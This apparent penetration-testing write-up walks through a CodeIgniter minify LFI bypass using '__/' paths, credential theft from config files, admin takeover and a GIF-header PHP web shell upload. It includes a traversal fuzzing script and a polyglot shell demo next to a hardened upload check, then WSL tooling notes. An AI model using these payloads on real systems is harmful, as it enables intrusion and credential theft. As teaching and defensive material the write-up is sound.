At this time I was using dirsearch. (I would use ffuf or feroxbuster these days.)
(something like the image)
I discovered (by proxying the site through Burp Suite and looking at responses and errors) that the application was written in CodeIgniter. I noted this down.
The content discovery yielded several paths, a few of note:
Visiting these gave nothing (to be expected), but I noted them all down.
During spidering, an additional path was found under the above:
/123/minify/minfycss/
When doing content discovery, the special characters in the wordlists were producing interesting errors: PHP errors to do with incorrect pathing.
I began to suspect there might be a path-based Local File Inclusion (LFI)...
Fuzzing the path with things like:
/123/minify/minfycss/../../../../../etc/passwd
gave different errors for the incorrect pathing format.
I fuzz things like this with the LFI list in SecLists:
After MUCH trial and error (and bringing in some fellow testers), we found the correct pathing for /etc/passwd (helped by phpinfo).
The big one was that the minify function was stripping the periods in our ../
but also using underscores (instead) for pathing on *nix.
We ended up doing something like this:
/123/minify/minfycss/__/__/__/__/__/etc/passwd
BAM. It worked! "Root dance" #1
We weren't sure if the underscore behavior was because of a CodeIgniter feature or the way the minify function was written.
So now we could read any file on the web server.
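The fuzzing loop described above, as an added example that is not code from the original thread: it generates traversal payloads per depth (plain, URL-encoded, double-encoded, and the period-stripped `__/` form the thread ended up with), sends them, and classifies each response as a hit, a PHP path error worth chasing, or noise. The host `target.example`, the sample passwd content and the `fake_fetch` stand-in server are constructed so the script runs offline; swap in `http_fetch` for a live target.

```python
"""Added example, not code from the original thread: a small LFI path
fuzzing harness in the spirit of the ffuf/SecLists run described above.
It generates traversal variants per depth, including the period-stripped
'__/' form the thread found, and classifies each response. The host,
sample passwd content and the fake server below are constructed."""
import re
import urllib.error
import urllib.parse
import urllib.request

# Assumed target; the thread does not name the host.
BASE_URL = "http://target.example/123/minify/minfycss/"
TARGET_FILE = "etc/passwd"

# Fragments of the PHP warnings you see when a file call gets a bad path.
PHP_PATH_ERROR_RE = re.compile(
    r"failed to open stream|No such file or directory|Failed opening", re.I)
# The root entry that opens a Unix passwd file.
PASSWD_RE = re.compile(r"^root:[^:\n]*:0:0:", re.M)


def traversal_variants(depth, target=TARGET_FILE):
    """Candidate payloads for one directory depth, keyed by encoding:
    plain ../, URL-encoded ..%2f, double-encoded ..%252f, and the __/
    form that worked in the thread once minify had stripped the periods."""
    prefixes = {"plain": "../", "urlencoded": "..%2f",
                "double": "..%252f", "underscore": "__/"}
    return {name: p * depth + target for name, p in prefixes.items()}


def looks_like_passwd(body):
    return bool(PASSWD_RE.search(body))


def classify(status, body):
    """HIT: passwd content came back. PATH_ERROR: PHP complained about the
    path, so the input reaches a file call and is worth more fuzzing.
    OTHER: nothing useful (status is kept for logging only)."""
    if looks_like_passwd(body):
        return "HIT"
    if PHP_PATH_ERROR_RE.search(body):
        return "PATH_ERROR"
    return "OTHER"


def http_fetch(url, timeout=10):
    """Live fetcher returning (status, body); not used by the offline demo."""
    req = urllib.request.Request(url, headers={"User-Agent": "lfi-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def fuzz(base_url, max_depth, fetch=http_fetch):
    """Try every variant at depths 1..max_depth, stopping at the first HIT.
    Returns a list of (depth, variant, url, verdict)."""
    results = []
    for depth in range(1, max_depth + 1):
        for name, payload in traversal_variants(depth).items():
            url = base_url + payload
            status, body = fetch(url)
            verdict = classify(status, body)
            results.append((depth, name, url, verdict))
            if verdict == "HIT":
                return results
    return results


# Constructed stand-in for the vulnerable server so the demo runs offline:
# '../' style paths produce a PHP path warning, and only the '__/' form at
# depth 5 resolves to the passwd file. This is an assumption about the
# observed behaviour, not a reconstruction of the real minify code.
SAMPLE_PASSWD = ("root:x:0:0:root:/root:/bin/bash\n"
                 "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n")


def fake_fetch(url):
    path = urllib.parse.urlsplit(url).path
    if path.count("__/") == 5 and path.endswith(TARGET_FILE):
        return 200, SAMPLE_PASSWD
    if "../" in path or "%2f" in path.lower():
        return 200, ("Warning: file_get_contents(/var/www/css/etc/passwd): "
                     "failed to open stream: No such file or directory")
    return 404, "Not found"


if __name__ == "__main__":
    for depth, name, url, verdict in fuzz(BASE_URL, 6, fetch=fake_fetch):
        print(f"{verdict:<10} depth={depth} {name:<11} {url}")
```

The PATH_ERROR bucket is the useful one while you are still hunting: it tells you the input reaches a file call even when the content does not come back yet, which is exactly the signal the thread describes before the `__/` form was found.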
Pentesting is a circular methodology.
So we used that vulnerability to pull down all of the CodeIgniter configuration files.
These included multiple API keys.
Remember the database.php file from earlier?
Yep... it had database credentials in it!
Remember phpMyAdmin? We used those creds there.
Boom, we had access to the complete database of users.
Enter "root dance" #2.
Remember gmail.php?
It contained developer Gmail creds for some sort of integration. We could log into the Gmail account of the company's administrator.
Full permissions on G Suite.
We used phpMyAdmin to add ourselves as users to the
/adminpanel
and got access to the backend super-user part of the site.
It had the control to do everything. It had all the log access, configs, etc, etc.
We also bypassed their image upload and were able to upload a PHP shell.
One function checked for images by checking the binary header, but not the file extension (on the server side). We uploaded a shell with a GIF binary header through Burp Suite as a .php file.
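The header-only check the thread describes, next to a hardened version, as an added example that is not code from the original thread or the target application. The GIF-prefixed PHP payload is constructed, and the function names (`weak_accept`, `hardened_accept`, `build_polyglot`) are this example's own.

```python
"""Added example, not code from the original thread: the upload check the
thread describes (image magic bytes only, client-supplied extension kept)
next to a hardened version. The GIF-prefixed PHP payload is constructed,
and the function names are this example's own."""
import os
import secrets

# Leading bytes of the image formats we accept, mapped to an extension.
MAGIC = {
    b"GIF87a": "gif",
    b"GIF89a": "gif",
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
}
# Client extensions we allow, normalised to the sniffed type's name.
ALLOWED_EXT = {"gif": "gif", "png": "png", "jpg": "jpg", "jpeg": "jpg"}


def sniff_image_type(data):
    """Return 'gif', 'png' or 'jpg' from the leading bytes, else None."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def build_polyglot(php_source, header=b"GIF89a"):
    """Attacker side: a file that passes a header-only check but is still
    PHP source after the prefix (PHP echoes the bytes before '<?php' as
    literal output and executes the rest)."""
    return header + b"\n" + php_source


def weak_accept(filename, data):
    """The vulnerable check from the thread: header only. The filename is
    never inspected, so 'shell.php' is stored and served as PHP."""
    return sniff_image_type(data) is not None


def hardened_accept(filename, data):
    """Return the name to store the file under, or None to reject.

    The sniffed type must exist, the client's last extension must be in
    the allow list, and the two must agree; the stored name is chosen by
    the server so the client never controls the extension on disk."""
    kind = sniff_image_type(data)
    if kind is None:
        return None
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    if ext not in ALLOWED_EXT or ALLOWED_EXT[ext] != kind:
        return None
    return f"{secrets.token_hex(16)}.{kind}"


if __name__ == "__main__":
    shell = build_polyglot(b"<?php system($_GET['cmd']); ?>")
    print("weak check, shell.php:", weak_accept("shell.php", shell))
    print("hardened, shell.php:", hardened_accept("shell.php", shell))
    print("hardened, cat.gif:", hardened_accept("cat.gif", shell))
```

The hardened version stops the exact trick in the thread (a `.php` name with an image header), but a polyglot uploaded as `cat.gif` still lands on disk with PHP inside it. That is why the extension check is paired with an upload directory where script execution is disabled, or uploads served from a separate origin, rather than relied on alone.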
In the end, the methodology and documentation of your hacking are important. Persistence is key.
We had full access to every portion of the company.
If you don't want to use a VPS or run Linux natively (dual boot), you can install Ubuntu on WSL 2.
(+) You'll (probably) benefit from more memory, more cores, and a fast broadband connection.
(+) You can eliminate or supplement your VPS costs.
(+) Usability is nice (file management, copy-paste).
(-) WSL 2 does not yet support raw sockets, so no nmap or masscan.
(-) Mass DNS requests (resolver tools like massdns/puredns) will crash WSL DNS for some reason.
(-) On WSL 1.0 (if you decide to use that), git is painfully slow, including setting up dependencies in large frameworks like reconFTW.
(+) Your gains in speed per dollar are good. A VPS equivalent to most gaming rigs (proc/mem/storage) will run you $80-$120 on DigitalOcean.